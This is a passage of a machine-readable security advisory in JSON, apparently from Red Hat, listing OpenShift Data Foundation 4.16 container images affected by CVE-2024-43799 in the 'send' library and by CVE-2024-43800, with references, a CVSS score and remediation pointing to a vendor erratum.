"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
